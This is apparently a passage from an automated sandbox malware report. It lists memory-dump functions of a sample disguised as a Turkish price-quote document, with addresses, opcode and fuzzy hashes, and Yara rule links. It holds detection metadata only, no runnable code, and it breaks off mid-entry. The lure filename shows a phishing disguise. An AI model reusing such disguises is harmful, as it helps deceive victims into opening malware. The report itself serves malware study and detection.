                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c7c3db2f75558742e2988dda4f25da716749ef927e37d136c2fad339b49aeda4
                                                                                                      • Instruction ID: 0df39fcc3f9cce2889c43cf5bd74425ab1bad3f22df8e6e6f48dd6bcf4331c48
                                                                                                      • Opcode Fuzzy Hash: c7c3db2f75558742e2988dda4f25da716749ef927e37d136c2fad339b49aeda4
                                                                                                      • Instruction Fuzzy Hash: 84B1C071B013429FD725CF68D484A9ABBF2FF85224B59C5AAE5498B352CB30FC46CB50
                                                                                                      Function 075A3BA8 Relevance: .3, Instructions: 296COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 20136bb2240a4f90b517f63408b67ab1bc8ecb20bdf0b0fededa3892fb2f1b82
                                                                                                      • Instruction ID: 01b01ae97b4ac6ae9b3e381f36fa665cc8909eedaa357f573f1abd85713876f2
                                                                                                      • Opcode Fuzzy Hash: 20136bb2240a4f90b517f63408b67ab1bc8ecb20bdf0b0fededa3892fb2f1b82
                                                                                                      • Instruction Fuzzy Hash: 1BB16CB0720602AFDB20CF69C4456AABBF6BF85608F14497AE547DB350DB34E846CB61
                                                                                                      Function 075AAC58 Relevance: .3, Instructions: 273COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e3dd3aecfbf0b8109040871d6accbf67f8757fdc6fcc002824ae8aa37386e89d
                                                                                                      • Instruction ID: f94a4f296a2b90824c943c69f442a7a39223deccaebf812affcf2a5df55d18b4
                                                                                                      • Opcode Fuzzy Hash: e3dd3aecfbf0b8109040871d6accbf67f8757fdc6fcc002824ae8aa37386e89d
                                                                                                      • Instruction Fuzzy Hash: 9DB14DB0204342EFD761CB28D584BA9BBE2FF41315F48C4BAE4858F6A2D775E885CB50
                                                                                                      Function 075A47F1 Relevance: .2, Instructions: 248COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0d3248daa1f68f39c1bb4cad98ec55e929f3d70a397d8d4cc4e4bd5a82aad722
                                                                                                      • Instruction ID: a4e5ada4a097cfca566d12e7eef84c216886b89a4b731d7cbc50235092398528
                                                                                                      • Opcode Fuzzy Hash: 0d3248daa1f68f39c1bb4cad98ec55e929f3d70a397d8d4cc4e4bd5a82aad722
                                                                                                      • Instruction Fuzzy Hash: 9FA15EB4B01245EFDB14DFA8D498AADBBB6FF88710F14806AE8069B355DB35DC41CB50
                                                                                                      Function 075A1CD8 Relevance: .2, Instructions: 233COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c6ba7cc721474b3247a4896179e22342464aea61568ba5c643d3ad9bf26a67e3
                                                                                                      • Instruction ID: f05af5172dfe602c6f06dc11c6260d94e601a3d49fe946cc430cff370998828d
                                                                                                      • Opcode Fuzzy Hash: c6ba7cc721474b3247a4896179e22342464aea61568ba5c643d3ad9bf26a67e3
                                                                                                      • Instruction Fuzzy Hash: 21816B75B006059FDB14DB79D594AAE7BF6EF88210F1484AAE506DB365DF30EC02CB90
                                                                                                      Function 075A5050 Relevance: .2, Instructions: 201COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f0aaa13756c526bfbe1e664f48a496fb810478db675dfb3c64344f766e522579
                                                                                                      • Instruction ID: 32934f866e5fa9b8f61f4f81a405d40c401ee212a8ee5f851dfddbca92312082
                                                                                                      • Opcode Fuzzy Hash: f0aaa13756c526bfbe1e664f48a496fb810478db675dfb3c64344f766e522579
                                                                                                      • Instruction Fuzzy Hash: 1F815374A103069FDB24DF68D484AAEBBF2FF84210F14853AE846C7355EB30E956CB91
                                                                                                      Function 075A5040 Relevance: .2, Instructions: 200COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d70eb34aa335566b0b73b1534611f89dfd3bf916aa9f9f1d1208d36bbc4d698b
                                                                                                      • Instruction ID: 9262f376746359e572ae80cd4ed4bd8a5308cd37a6779238624f3d7ae5714e26
                                                                                                      • Opcode Fuzzy Hash: d70eb34aa335566b0b73b1534611f89dfd3bf916aa9f9f1d1208d36bbc4d698b
                                                                                                      • Instruction Fuzzy Hash: 8F7170B5A113069FCB25CF68D884AAEBBF2FF44310F14853AE415DB251EB30E956CB91
                                                                                                      Function 05DDD184 Relevance: .2, Instructions: 171COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 024184f004cf9a33a9815e548b3a2cf1998bca9baa04021033c097b285a600fb
                                                                                                      • Instruction ID: e64ef1d94ed3398d252115c7beee8379e9f17a68054c5e0d4b64bd3231c96ff9
                                                                                                      • Opcode Fuzzy Hash: 024184f004cf9a33a9815e548b3a2cf1998bca9baa04021033c097b285a600fb
                                                                                                      • Instruction Fuzzy Hash: 3D517F70E012149BEB14EBA9C842BBDFBB3FF45311F148067E955A7384DB349942CBA2
                                                                                                      Function 075A4E60 Relevance: .2, Instructions: 169COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f376586c49844554534b9116d151c879ad752f1401ea5bfea2069e6dbabc30a5
                                                                                                      • Instruction ID: 0b09b1ba7d0619654f906ddfce4cacf31b6897c5c3518a2d4737678bc0abeb13
                                                                                                      • Opcode Fuzzy Hash: f376586c49844554534b9116d151c879ad752f1401ea5bfea2069e6dbabc30a5
                                                                                                      • Instruction Fuzzy Hash: 5B61C6B4E002599FDB54CFA9D480A9EBBF5FF88310F10446AE919EB314E7719952CF60
                                                                                                      Function 075A32E8 Relevance: .2, Instructions: 168COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 78399034ffba3514401174121018e436536e01b0cdecbf51e5c742155948b45b
                                                                                                      • Instruction ID: 9da7df30569ff50bf1c333c4bf616beebdfbd9a33a33f783621c85a365b36f21
                                                                                                      • Opcode Fuzzy Hash: 78399034ffba3514401174121018e436536e01b0cdecbf51e5c742155948b45b
                                                                                                      • Instruction Fuzzy Hash: C5715C70A00306AFDB15DF68C484A9ABBF1FF49314B54C56AD4599F362D770EC86CB90
                                                                                                      Function 075A4E5A Relevance: .1, Instructions: 148COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fbc7592711033c3dd4acac782827fe18d18834739d14f997687dfcc4e323ba88
                                                                                                      • Instruction ID: fe2f03e4912645b0bb6337ee965f35efcdadafa0ed8b51e41b99941d4806a4fc
                                                                                                      • Opcode Fuzzy Hash: fbc7592711033c3dd4acac782827fe18d18834739d14f997687dfcc4e323ba88
                                                                                                      • Instruction Fuzzy Hash: E351D7B4A0025A9FDB54CFA9D480A9EBBF5BF48310F10446AE919EB314E771D942CB60
                                                                                                      Function 075A8E68 Relevance: .1, Instructions: 144COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6c83131fcd79d789790a12a6f00efbe10f374a945859fb60c6057f72283bd6af
                                                                                                      • Instruction ID: 8442de832399bf9a63598df177e29fe5619ed33d90dfc69ddc78d08edfc6ab84
                                                                                                      • Opcode Fuzzy Hash: 6c83131fcd79d789790a12a6f00efbe10f374a945859fb60c6057f72283bd6af
                                                                                                      • Instruction Fuzzy Hash: 7041CF31A00701AFD715EB68D484A9ABBFAFF85210B45C56AE40A8B791DB30FC068B95
                                                                                                      Function 075A85B0 Relevance: .1, Instructions: 142COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 711f8a558668c78aa24987651b7fb76fd1c87e4f8db8f5bd473be6c442d469c3
                                                                                                      • Instruction ID: c8e6116bac4ad9d6547764f87f6fcdf9739f8974b778e1d73b4b26683ed591f9
                                                                                                      • Opcode Fuzzy Hash: 711f8a558668c78aa24987651b7fb76fd1c87e4f8db8f5bd473be6c442d469c3
                                                                                                      • Instruction Fuzzy Hash: F141CFB0714642BBE7264A7594007AF77EABB82200F144D3AE55BC7280DB32F8868791
                                                                                                      Function 075AA0B9 Relevance: .1, Instructions: 138COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d2cd3c60f3cdac02938284843787a00729efc2283d9d1ee749f4cce8602559ef
                                                                                                      • Instruction ID: 0083f1bbfe0beb3b256543050256db85305aa36e1310b00ed34508c8992ad9a7
                                                                                                      • Opcode Fuzzy Hash: d2cd3c60f3cdac02938284843787a00729efc2283d9d1ee749f4cce8602559ef
                                                                                                      • Instruction Fuzzy Hash: EB51E5B5A006459FDB15CF99C884A9EFBF2BF48300F04856AE849AB761D771E845CB40
                                                                                                      Function 075A94F0 Relevance: .1, Instructions: 136COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 618a393fc747e632ed161414268947aa3d17dadecc0a77bcd69c77744bbffd3b
                                                                                                      • Instruction ID: 8d7489eb003b375875cad85670e05a50037be11c0a3741df9978acf8f62e43de
                                                                                                      • Opcode Fuzzy Hash: 618a393fc747e632ed161414268947aa3d17dadecc0a77bcd69c77744bbffd3b
                                                                                                      • Instruction Fuzzy Hash: 34516F75A00105AFDB40DFA9D845ADEFBF5FF88320F148166E5059B211D731E951CBA0
                                                                                                      Function 075AB458 Relevance: .1, Instructions: 123COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5031e4f99f3c7b3df98bc9e05c103a0875f4635547148c9607ae73efcc215f2c
                                                                                                      • Instruction ID: 438e542865ce5ab5a7a1776ffe682fed715b20f34e1cd94c9ea4c03c7dcc7db8
                                                                                                      • Opcode Fuzzy Hash: 5031e4f99f3c7b3df98bc9e05c103a0875f4635547148c9607ae73efcc215f2c
                                                                                                      • Instruction Fuzzy Hash: 7141C0F0A04702AFDB308A29C0847AA7BE2BF49314F444D7ED48687691D774F889C7A1
                                                                                                      Function 05DD836F Relevance: .1, Instructions: 122COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 270471974371d7fb1ef1dfe6612478a9d7a86648b35aa4888db5c61530ffa45b
                                                                                                      • Instruction ID: 5173305dd7868fb83e7782f96fdbaaf0c566833fb23e682285f97842f513bf40
                                                                                                      • Opcode Fuzzy Hash: 270471974371d7fb1ef1dfe6612478a9d7a86648b35aa4888db5c61530ffa45b
                                                                                                      • Instruction Fuzzy Hash: 03417D71D053189FDB16DFA8D8506EEFBB2FF89310F14806AE804AB361DB349946CB95
                                                                                                      Function 075A9A27 Relevance: .1, Instructions: 106COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f695fea6358200c00f2e4da8cf20ecd3c6311fa772e9b8492fbc16cc10e7aa3e
                                                                                                      • Instruction ID: 884f5251290a839ab1f92127518991fd64e13311db87a4bf148e2b7fd588308c
                                                                                                      • Opcode Fuzzy Hash: f695fea6358200c00f2e4da8cf20ecd3c6311fa772e9b8492fbc16cc10e7aa3e
                                                                                                      • Instruction Fuzzy Hash: E1413034600B069BD724EF39D8817AEB7E2FF94314F548A29E0468F794EA71B9068791
                                                                                                      Function 075A9A38 Relevance: .1, Instructions: 100COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ba805e4628e350bc20fefdbb07f6a9fb201b4260065a7e16479be12e4542a556
                                                                                                      • Instruction ID: dd4ce7a0ff38c2ccf8429a1248e09241f4a4c99ef30eb0eef44b78118459b617
                                                                                                      • Opcode Fuzzy Hash: ba805e4628e350bc20fefdbb07f6a9fb201b4260065a7e16479be12e4542a556
                                                                                                      • Instruction Fuzzy Hash: FD310E34600B069BD764EF39D8817AFB7E2FF84314F548A29E0464F754EAB1B906CB91
                                                                                                      Function 075A3511 Relevance: .1, Instructions: 99COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 75a30aa0a31af37bf2549eac81532d38475a725c70cf7fc2f86208d09b07ad5f
                                                                                                      • Instruction ID: 9f1564ac709945c152ae6841fe505b8a2c83dd0bcd302a9c7f1f57c00e779cea
                                                                                                      • Opcode Fuzzy Hash: 75a30aa0a31af37bf2549eac81532d38475a725c70cf7fc2f86208d09b07ad5f
                                                                                                      • Instruction Fuzzy Hash: CB31D071701340AFD725DF38D894A9ABBB6EF85324B5484BAE5468F262CB31EC45CB60
                                                                                                      Function 05DDE098 Relevance: .1, Instructions: 96COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2476d29916c5958f8df579ed0a8d95efe1d78de58077ae8078339279ae576ab7
                                                                                                      • Instruction ID: 6c2e4657009a11fa54550f3da8ff7fc13a64f6977afc7f88d96f1cbf5884379b
                                                                                                      • Opcode Fuzzy Hash: 2476d29916c5958f8df579ed0a8d95efe1d78de58077ae8078339279ae576ab7
                                                                                                      • Instruction Fuzzy Hash: 75318B31B09219CBD7118A69CD416BAFBAEFB85250F144123E562CF395C6B8D882C6B2
                                                                                                      Function 05DDCA48 Relevance: .1, Instructions: 95COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0f4796a03ab3e1c0f544d55ef72c58d8c9c3e4d7398f0809b0bdfeadbf1fb805
                                                                                                      • Instruction ID: 1c4f0684695774a4821554f53b5522531bdecf442d387fc079d3ed3b4088039d
                                                                                                      • Opcode Fuzzy Hash: 0f4796a03ab3e1c0f544d55ef72c58d8c9c3e4d7398f0809b0bdfeadbf1fb805
                                                                                                      • Instruction Fuzzy Hash: 0C3137B2A102099FDF14DFA9D884ADEBFF5EB48310F10842AE909A7310D735A955CFA0
                                                                                                      Function 05DD95CE Relevance: .1, Instructions: 95COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cf5e45a30895314bad040bc05a47fba12e6760b9172a1b0074e44bf0d2b278b6
                                                                                                      • Instruction ID: f833799b45a794bd054edd7a893d4813a4cb343e21de54f888847beeef03c4b8
                                                                                                      • Opcode Fuzzy Hash: cf5e45a30895314bad040bc05a47fba12e6760b9172a1b0074e44bf0d2b278b6
                                                                                                      • Instruction Fuzzy Hash: 7D31D671A293908FC7115F78986D229BFB1FF462117084597F942CB292DE389C01C761
                                                                                                      Function 05DD83D0 Relevance: .1, Instructions: 91COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 48ed53c2d2528d8780c8cdefec0f6a1a46008293dd0bf95ce538df4736ef4d7f
                                                                                                      • Instruction ID: 0769871aee8dc1e07cddfa4023516cd7f0d208f1d06f8a73221ea24d4802caae
                                                                                                      • Opcode Fuzzy Hash: 48ed53c2d2528d8780c8cdefec0f6a1a46008293dd0bf95ce538df4736ef4d7f
                                                                                                      • Instruction Fuzzy Hash: 5931D375E002189FDB15DFA9C844AEEFBB2FF88310F148029E805A7360DB35A942DF95
                                                                                                      Function 05DD83E0 Relevance: .1, Instructions: 86COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0292163120c69da0a00f0fcca2b685661627bd60652a9ba3c535e79a535ced9b
                                                                                                      • Instruction ID: f7c9ec616774c26d800c6f937fbd1ef45ed84a3c824934880ad911a5381c0133
                                                                                                      • Opcode Fuzzy Hash: 0292163120c69da0a00f0fcca2b685661627bd60652a9ba3c535e79a535ced9b
                                                                                                      • Instruction Fuzzy Hash: EE31B474E002189FDB15DFA9C844AEEFBB2FF88300F148029E405A7350DB35A942DF95
                                                                                                      Function 05DDE088 Relevance: .1, Instructions: 85COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a112aaf343ba42e0ed028244d4f21d1850a18bfbf05f9c48a684e58a2224464c
                                                                                                      • Instruction ID: d206ca00d31843b6eac0f274d9a804bed854a1c54e998fd0660a5a5c49acf195
                                                                                                      • Opcode Fuzzy Hash: a112aaf343ba42e0ed028244d4f21d1850a18bfbf05f9c48a684e58a2224464c
                                                                                                      • Instruction Fuzzy Hash: E021A071A09219CBC7118F68CE412BEFBAAFB85260F044123E561DF3D5D674D981C7B2
                                                                                                      Function 075A9828 Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1d2e01db28f399f8ca35f82f527a56ce75b0c635b18643494de3bfa0a565097b
                                                                                                      • Instruction ID: 9efc792b7eef50f4a38916bb85fb7a2bfd1d6e9f176afa8b47ecf2b652f51777
                                                                                                      • Opcode Fuzzy Hash: 1d2e01db28f399f8ca35f82f527a56ce75b0c635b18643494de3bfa0a565097b
                                                                                                      • Instruction Fuzzy Hash: 10219474720216AFDB149F68D855ABE7FA6FB88741F404829F812D7340DF35AC009BA1
                                                                                                      Function 05DD9608 Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c99cf83839142733a0913b999a265d400056aaf3774e285510d7a15c94acebbe
                                                                                                      • Instruction ID: f632df0535698243e7be09e3bf18939779a2ce91dce19482a1fd5100a1761b6b
